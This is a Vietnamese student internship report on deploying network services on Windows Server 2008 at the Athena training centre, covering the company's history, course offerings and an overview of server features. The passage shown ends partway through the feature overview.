bao cao-thuc-tap

TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP TPHCM – KHOA CNTTTRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ

AN NINH MẠNG QUỐC TẾ ATHENA

----------

BÁO CÁO THỰC TẬP TỐT NGHIỆP

ĐỀ TÀI: NGHIÊN CỨU VÀ TRIỂN KHAI CÁC DỊCH VỤ MẠNG

TRÊN WINDOWS SERVER 2008

Giáo viên hướng dẫn : Võ Đỗ Thắng

Sinh viên thực tập : Nguyễn Trọng Sáng

MSSV : 11082461

Lớp : DHTH7C

Thời gian thực tập : từ 17/3/2015 đến 17/5/2015

Tp. HCM, tháng 6 năm 2015

LỜI CẢM ƠN

Để có những buổi thực tập bổ ích và hiệu quả tại trung tâm Athena, trước tiên

tôi xin bày tỏ tình cảm và lời cảm ơn chân thành tới trung tâm Athena đã tạo điều

kiện cho tôi được thực tập tại trung tâm. Đặt biệt gửi lời cảm ơn đến thầy Võ Đỗ

Thắng và các anh chị tại trung tâm đã tạo mọi điều kiện tốt nhất để tôi có thể tiếp

cận với thực tế, cung cấp thông tin, tài liệu để tôi hoàn thành tốt quá trình thực tập

và bài báo cáo này, đồng thời cũng đã hướng dẫn và truyền đạt nhiều kiến thức quý

báu, góp ý kiến giúp tôi định hướng cho công việc sau này.

Tôi xin chân thành cảm ơn đến quý thầy cô Khoa công nghệ thông tin

Trường Đại Học Công Nghiệp TPHCM đã cung cấp cho tôi cả về kiến thức chuyên

môn lẫn tinh thần học tập, đó là nền tảng giúp tôi có được kiến thức vững chắc để

tiếp thu kiến thức thực tế trong quá trình thực tập một cách nhanh chóng và là kiến

thức cơ sở cho công việc sau này.

Bên cạnh đó, tôi xin chân thành cảm ơn sự hướng dẫn tận tình của cô TS.

Nguyễn Thị Phương Giang đã giúp đỡ tôi hoàn thành báo cáo thực tập này.

Xin cảm ơn tất cả các bạn bè đã giúp đỡ về tinh thần cũng như kiến thức cho

tôi trong quá trình thực hiện hoàn thành báo cáo này.

Tôi xin kính chúc Quý thầy cô và các anh chị tại trung tâm dồi dào sức khỏe

và thành công trong công việc. Kính chúc trung tâm Athena kinh doanh ngày càng

đạt hiệu quả

TP Hồ Chí Minh ,Tháng 6 Năm 2015

Sinh viên thực hiện

Nguyễn Trọng Sáng

SVTH: Nguy n Tr ng Sáng ễ ọ Page 1

LỜI NÓI ĐẦU

Microsoft Windows Server 2008 là thế hệ kế tiếp của Windows Server, có

thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ sở hạ tầng và

cung cấp khả năng quản lý hiệu quả hơn, là sản phẩm đảm bảo độ an toàn, khả năng

tin cậy và môi trường máy chủ vững chắc hơn.

Windows Server 2008 cung cấp các giá trị mới cho các tổ chức bằng việc bảo

đảm tất cả người dùng đều có thể có được những thành phần bổ sung từ các dịch vụ

từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vượt trội bên trong

hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên gia tăng được thời

gian hổ trợ được các công việc của doanh nghiệp. Windows Server 2008 xây dựng

trên sự thành công và sức mạnh của hệ điều hành đã có trước đó là Windows Server

2003 và những cách tân trong bản server pack 1 và Windows Server 2008 R2.

Windows Server 2008 được thế kế để cung cấp cho các tổ chức có được nền

tảng sản xuất nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm việc đến

những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và những cải

thiện mạnh mẽ cho hệ điều hành cơ bản.


NHẬN XÉT

(của cán bộ hướng dẫn tại công ty thực tập)

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

……………………………………………………………………………………..

XÁC NHẬN CỦA CƠ QUAN

GIÁM ĐỐC

(ký tên và đóng dấu)

TPHCM, Ngày… Tháng … Năm 2015

CÁN BỘ HƯỚNG DẪN

(ký tên)


NHẬN XÉT

(của giáo viên hướng dẫn tại khoa)

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

TPHCM, Ngày… Tháng … Năm 2015

GIÁO VIÊN HƯỚNG DẪN

(ký tên)


MỤC LỤC

CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ

AN NINH MẠNG QUỐC TẾ ATHENA.........................................................................8

1. Giới thiệu về công ty............................................................................................8

2. Quá trình hình thành và phát triển....................................................................9

3. Cơ cấu tổ chức....................................................................................................11

4. Tình hình hoạt động trong năm........................................................................12

5. Cơ sở hạ tầng......................................................................................................13

6. Khách hàng.........................................................................................................13

7. Đối tác.................................................................................................................13

CHƯƠNG 2: NỘI DUNG THỰC TẬP..........................................................................14

1. Kiến thức tìm hiểu.............................................................................................14

2. Windows Server 2008........................................................................................15

CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008.....................................18

1. GIỚI THIỆU WINDOWS SERVER 2008........................................................18

2. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008.....................................19

2.1. Công cụ quản trị Server Manager..................................................................19

2.2. Windows Server Core....................................................................................19

2.3. PowerShell.....................................................................................................20

2.4. Windows Deloyment Services.......................................................................20

2.5. Terminal Services...........................................................................................20

2.6. Network Access Protection............................................................................21

2.7. Read-Only Domain Controllers.....................................................................21

2.8. Công nghệ Failover Clustering......................................................................22


2.9. Windows Firewall with Advance Security.....................................................22

3. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008....................22

3.1. Công nghệ ảo hóa Hyper-V............................................................................22

3.2. Processor Compatibility Mode.......................................................................23

3.3. File Classification Infrastructure....................................................................23

3.4. Quản lý trong ỗ đĩa và file..............................................................................23

3.5. Cải tiến giao thức và mã hóa..........................................................................23

3.6. Một số tính năng khác....................................................................................24

4. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008............................................24

4.1. Web................................................................................................................24

4.2. Ảo hóa............................................................................................................25

4.3. Bảo mật..........................................................................................................25

4.4. Network Access Protection (NAP)................................................................25

4.5. Read-Only Domain Controller (RODC)........................................................25

4.6. BitLocker........................................................................................................26

4.7. Windows Firewall..........................................................................................26

5. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008......................................26

5.1. Windows Server 2008....................................................................................26

5.2. Windows Server 2008 Standard Edition........................................................26

5.3. Windows Server 2008 Enterprise Edition......................................................27

5.4. Windows Server 2008 Datacenter Edition.....................................................27

5.5. Windows Web Server 2008............................................................................27

6. CÀI ĐẶT WINDOWS SERVER 2008...............................................................28

6.1. Yêu cầu phần cứng.........................................................................................28

6.2. Các cách cài đặt..............................................................................................28

7. NÂNG CẤP LÊN WINDOWS SERVER 2008.................................................29

8. QUÁ TRÌNH CÀI ĐẶT WINDOWS SERVER 2008.......................................30

CHƯƠNG 4: DOMAIN...................................................................................................35


1. CÀI ĐẶT DOMAIN...........................................................................................35

2. JOIN DOMAIN..................................................................................................45

CHƯƠNG 5: TRIỂN KHAI CÁC DỊCH VỤ MẠNG.................................................48

1. DỊCH VỤ DNS....................................................................................................48

1.1. Giới thiệu về DNS.........................................................................................48

1.2. Cài đặt DNS..................................................................................................48

1.3. Cấu hình DNS...............................................................................................49

2. DỊCH VỤ DHCP................................................................................................55

2.1. Giới thiệu về dịch vụ DHCP.........................................................................55

2.2. Hoạt động của giao thức...............................................................................55

2.3. Cài đặt DHCP trên windows server 2008.....................................................55

2.4. Cấu hình DHCP...........................................................................................59

3. DỊCH VỤ VPN...................................................................................................63

3.1. Khái niệm......................................................................................................64

3.2. Các loại VPN................................................................................................65

3.3. Bảo mật trong VPN.......................................................................................66

3.4. Sản phẩm công nghệ dành cho VPN.............................................................67

4. VPN SITE TO SITE..........................................................................................68

5. DỊCH VỤ MAIL SERVER MDaemon............................................................84

CHƯƠNG 6: BẢO MẬT WINDOWS...........................................................................91

1. Khai thác lỗ hổng trên Windows XP với mã lỗi MS08_067........................91

2. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004........................94

KẾT LUẬN.....................................................................................................................102


CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA

1. Giới thiệu về công ty

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế

ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt

Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính

thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư

Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008. Tên công ty viết bằng tiếng nước

ngoài: Athena Advice Training Network Security Company Limited.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động,

nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp

phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và

đang tập trung chủ yếu vào các họat động sau:

Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh

vực mạng máy tính, internet, bảo mật và thương mại điện tử....

Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào

hoạt động sản xuất kinh doanh.

Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt

là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế

cho các tổ chức, doanh nghiệp có nhu cầu.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và

phát triển cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong

trường hợp xảy ra sự cố máy tính.

Trụ sở chính:


o Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

o Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh.

o Website: www.athena. com.vn

o Điện thoại: ( 84-8 ) 3824 4041

o Hotline: 0943 23 00 99

Cơ sở 2_Tại TP Hồ Chí Minh:

o Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

o 92 Nguyễn Đình Chiểu, Phường Đa Kao,Quận 1, Tp Hồ Chí Minh.

o Website: www.Athena.Edu.Vn

o Điện thoại: ( 84-8 ) 2210 3801

o Hotline: 0943 20 00 882. Quá trình hình thành và phát triển.

Quá trình hình thành

Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và

thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của

việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ

chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành

công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ

công ngh ệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh

nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ

cán bộ công nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:

Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính

Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.

Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty

EIS, Phó Tổng công ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu

trách nhiệm công nghệ thông tin của Ngân hàng.

Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an


http://www.athena.edu.vn/

http://www.athena.com.vn/

ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy

tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy

tính miền Nam.

Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, hay còn g ọi

là Trung tâm đào tạo Quản trị và An ninh mạng Quốc Tế Athena (tên thương hiệu

viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo

giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh

cấp ngày 04 tháng 11 năm 2008.

Quá trình phát triển.

Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình.

Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm

cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên c ủa các doanh

nghiệp về các chương trình qu ản lý dự án MS Project 2003, kỹ năng thương mại

điện tử, bảo mật web... và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng

kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa

đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công

nghệ thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra

thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng

đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại

học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời

gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công

nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ

giảng viên của trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng

mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm

rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút


vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng

thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải

đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác.

Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng

góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ

phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một

bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và

một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp

ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời

kì khủng hoảng.

Từ năm 2009 - nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược.

Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo

hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm

đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công

ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân

lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào

tiến trình tin học hóa nước nhà.

3. Cơ cấu tổ chức


Hình 1: Sơ đồ tổ chức công ty

4. Tình hình hoạt động trong năm

Cơ cấu sản phẩm.

Các khóa học dài hạn

– Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network -

security specialist- 18 tháng.

– Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork

security Technician- 12 tháng.

– Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager

Administrator.- 6 tháng.

Các khóa học ngắn hạn

Về quản trị mạng:

- Quản trị mạng MCSA 2003 – 2008

- Quản trị mạng Cisco – CCNA

- Quản trị mạng Microsoft nâng cao – MCSE

- Quản trị hệ thống mạng Linux 1 và Linux 2

- Quản trị mạng cơ bản và cài đặt máy tính – ACBN

Về an ninh mạng:

- System Hacking – xâm nhập và khai thác lỗ hỏng hệ điều hành

- Hacking và bảo mật máy tính Windows

- Bảo mật mạng Wi-Fi

- Hacker mũ trắng Athena

- Bảo mật mạng ACNS

Về Web và thương mại điện tử:

- SEO Google

- Thiết kế, quản trị website doanh nghiệp bằng Joomla

- Xây dụng và quản trị diễn đàn, trang rao vặt bằng VBB

- Lập trình và thiết kế web chuyên nghiệp bằng PHP và MySQL


- Internet Business

- Xây dựng web cấp tốc bằng WordPress

- Xây dựng web bán hàng trực tuyến

- Online Marketing

Các dịch vụ hỗ trợ:

– Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn

– Giới thiệu việc làm cho mọi học viên

– Thực tập có lương cho học viên khá giỏi

– Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không

giới hạn thời gian

– Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy

tính, mạng máy tính, bảo mật mạng

– Hỗ trợ thi Chứng chỉ Quốc tế.

5. Cơ sở hạ tầng

– Thiết bị đầy đủ và hiện đại.

– Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những

công nghệ mới nhất.

– Phòng máy rộng rãi, thoáng mát.

6. Khách hàng

– Mọi đối tượng chuyên hoặc không chuyên về CNTT.

– Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các

cán bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

7. Đối tác

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp

nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng

cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài

chính.

–


CHƯƠNG 2: NỘI DUNG THỰC TẬP

Nhiệm vụ được giao.

Nghiên cứu các dịch vụ mạng trên Windows Server 2008

Triển khai các dịch vụ mạng trên Windows Server 2008

1. Kiến thức tìm hiểu

Giải pháp mạng doanh nghiệp

Giới thiệu về mạng doanh nghiệp

Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô

và loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự

chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc

sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những

giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.

Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ

thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác

nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ thống được

kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng như độ

tin cậy của hệ thống.

Các thành phần công nghệ trong mạng doanh nghiệp

Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp

công nghệ và thiết kế sao cho phù hợp nhất.

Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ

thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng.

Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban đầu

hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự phát triển của

thế giới.


2. Windows Server 2008

Giới thiệu về mô hình Client-Server

Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến

việc thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào

các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer không

cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không có gì

ngạc nhiên khi họ thường có vấn đề với việc truy cập vào máy trạm, bị mất dữ liệu

do virus, spyware hay phải trải nghiệm việc internet bị gián đoạn. Máy tính nối

mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có một vài người dung trên mạng,

nhưng khi có nhiều hơn 5 hoặc 6 người sử dụng trên mạng của bạn, bạn thực sự phải

xem xét đầu tư một máy chủ mạng.Vậy lợi ích của mô hình Client-Server cụ thể là

gì?

- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin

là an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá nhân

và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được lưu trữ trên

mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ không nên xem. Ví

dụ, trong Folder chung thì group ketoan và group nhansu có quyền truy cập ủa nhân

viên…

- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang

bị nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song

song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hưởng đến

hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu trữ của máy chủ.

Không giống như một máy tính để bàn trung bình có sử dụng một ổ cứng duy nhất,

một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc trong một RAID cấu

hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy trình làm việc.

Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot swappable và nguồn

cung cấp điện. Các thành phần này có thể thay thế nóng cho phép bạn thay thế phần

cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra, kể từ khi tất cả các dữ


liệu nhân viên đang được lưu trữ trên mạng, nếu máy trạm của người dùng không

giữa ngày làm việc, nhân viên có thể truy cập các tập tin tương tự từ máy trạm khác.

- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng,

tất cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay từ

bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:

Tập trung lưu trữ dữ liệu ( RAID Array )

Network Attached Storage (NAS) thiết bị

Tháp đĩa CD / DVD

Máy in và máy chủ Fax

- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của

bạn là khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt,

cập nhật, phần mềm chống virus được cài đặt trên hệ thống của bạn là một điều cần

thiết.

Trong một văn phòng của 10 người hoặc ít hơn, hệ thống có thể được duy trì

riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành một gánh nặng thực

sự.

Trong những trường hợp này, một gói phần mềm chống virus kết hợp máy

trạm và bảo vệ chống virus máy chủ vào một giải pháp duy nhất có ý nghĩa hơn.

- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một

cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được lưu

trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy và nhanh

chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ liệu được lưu trữ

trên những gì máy trạm như bạn làm trong một mạng peer-to-peer. Ngày nay, hầu

hết các loại phương tiện truyền thông có thể được sử dụng cho mục đích sao lưu.

Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD, lưu trữ và thậm chí loại bỏ

Network Attached Storage (NAS) thiết bị này là chấp nhận được. Sự lựa chọn của

bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu cầu cụ thể của bạn sao lưu.

Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ dữ liệu của bạn, bất kỳ trong số


này sẽ là một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn có ít nhất một bản

sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.


CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008

1. GIỚI THIỆU WINDOWS SERVER 2008

Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành Windows

Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ sở

hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chưa từng có, là sản phẩm

hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy và môi trường máy chủ

vững chắc hơn các phiên bản trước đây.

Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng việc

bảo đảm tất cả người dùng đều có thể có được những thành phần bổ sung từ các

dịch vụ từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vượt trội bên

trong hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên tăng được

thời gian hỗ trợ cho các doanh nghiệp.

Windows Server 2008 được thiết kế để cung cấp cho các tổ chức có được nền

tảng sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm việc đến

những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và những cải

thiện mạnh mẽ cho hệ điều hành cơ bản.

Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới,

Windows Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ bản so

với hệ điều hành Windows Server 2003.

Những cải thiện có thể thấy được gồm có các vấn đề về mạng, các tính năng

bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập trung, các công

cụ kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng, sự triển khai và hệ

thống file.


2. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008

2.1. Công cụ quản trị Server Manager

Server Manager là một giao diện điều khiển được thiết kế để tổ chức và quản

lý một server chạy hệ điều hành Windows Server 2008. Người quản trị có thể sử

dụng Server Manager với những nhiều mục đích khác nhau.

- Quản lý đồng nhất trên một server

- Hiển thị trạng thái hiện tại của server

- Nhận ra các vấn đề gặp phải đối với các role đã đƣợc cài đặt một cách dễ

dàng hơn

- Quản lý các role trên server, bao gồm việc thêm và xóa role

- Thêm và xóa bỏ các tính năng

- Chẩn đoán các dấu hiệu bất thường

- Cấu hình server: có 4 công cụ (Task Scheduler, Windows Firewall,

Services và WMI Control).

- Cấu hình sao lưu và lưu trữ: các công cụ giúp bạn sao lưu và quản lý ổ đĩa

là Windows Server Backup và Disk Management đều nằm trên Server Manager.

2.2. Windows Server Core

- Server Core là một tính năng mới trong Windows Server 2008. Nó cho

phép có thể cài đặt với mục đích hỗ trợ đặc biệt và cụ thể đối với một số role.

- Tất cả các tương tác với Server Core được thông qua các dòng lệnh.

Server Core mang lại những lợi ích sau:

+Giảm thiểu được phần mềm, vì thế việc sử dụng dung lượng ổ đĩa cũng

được giảm. Chỉ tốn khoảng 1GB khi cài đặt.

+Bởi vì giảm thiểu được phần mềm nên việc cập nhật cũng không nhiều.

+Giảm thiểu tối đa những hành vi xâm nhập vào hệ thống thông qua các port

được mở mặc định.

+Dễ dàng quản lý.


- Server Core không bao gồm tất cả các tính năng có sẵn trong những phiên

bản cài đặt Server khác. Ví dụ như .NET Framework hoặc Internet Explorer.

2.3. PowerShell

PowerShell là một tập hợp lệnh. Nó kết nối những dòng lệnh shell với một

ngôn ngữ script và thêm vào đó hơn 130 công cụ dòng lệnh(được gọi là

cmdlets).Hiện tại, có thể sử dụng PowerShell trong:

Exchange Server

+SQL Server

+Terminal Services

+Active Directory Domain Services.

+Quản trị các dịch vụ, xử lý và registry.

Mặc định, Windows PowerShell chưa được cài đặt. Tuy nhiên bạn có thể cài

đặt nó một cách dễ dàng bằng cách sử dụng công cụ quản trị Server Manager và

chọn Features > Add Features

2.4. Windows Deloyment Services.

Windows Deployment Services được tích hợp trong Windows Server 2008

cho phép bạn cài đặt hệ điều hành từ xa cho các máy client mà không cần phải cài

đặt trực tiếp. WDS cho phép bạn cài đặt từ xa thông qua Image lấy từ DVD cài đặt.

Ngoài ra, WDS còn hỗ trợ tạo Image từ 1 máy tính đã cài đặt sẵn Windows và đầy

đủ các ứng dụng khác.

Windows Deployment Serviece sử dụng định dạng Windows Image (WIM).

Một cải tiến đặc biệt với WIM so với RIS là WIM có thể làm việc tốt với nhiều nền

tảng phần cứng khác nhau.

2.5. Terminal Services.

Terminal Services là một thành phần chính trên Windows Server 2009 cho

phép user có thể truy cập vào server để sử dụng những phần mềm.

Terminal Services giúp người quản trị triển khai và bảo trì hệ thống phần

mềm trong doanh nghiệp một cách hiệu quả. Người quản trị có thể cài đặt các


chương trình phần mềm lên Terminal Server mà không cần cài đặt trên hệ thống

máy client, vì thế việc cập nhật và bảo trì phần mềm trở nên dễ dàng hơn.

Terminal Services cung cấp 2 sự khác biệt cho người quản trị và người dùng

cuối Dành cho người quản trị: cho phép quản trị có thể kết nối từ xa hệ thống quản

trị bằng việc sử dụng Remote Desktop Connection hoặc Remote Desktop.

Dành cho người dùng cuối: cho phép người dùng cuối có thể chạy các

chương trình từ Terminal Services server.

2.6. Network Access Protection

Network Access Protection (NAP) là một hệ thống chính sách thi hành

(Health Policy Enforcement) được xây dựng trong các hệ điều hành Windows

Server 2008.

Cơ chế thực thi của NAP:

+ Kiểm tra tình trạng an toàn của client.

+Giới hạn truy cập đối với các máy client không an toàn.

+NAP sẽ cập nhật những thành phần cần thiết cho các máy client không an

toàn, cho đến khi client đủ điều kiện an toàn.Cho phép client kết nối nếu client đã

thỏa điều kiện.

+NAP giúp bảo vệ hệ thống mạng từ các client.

+NAP cung cấp bộ thư viên API (Application Programming Interface), cho

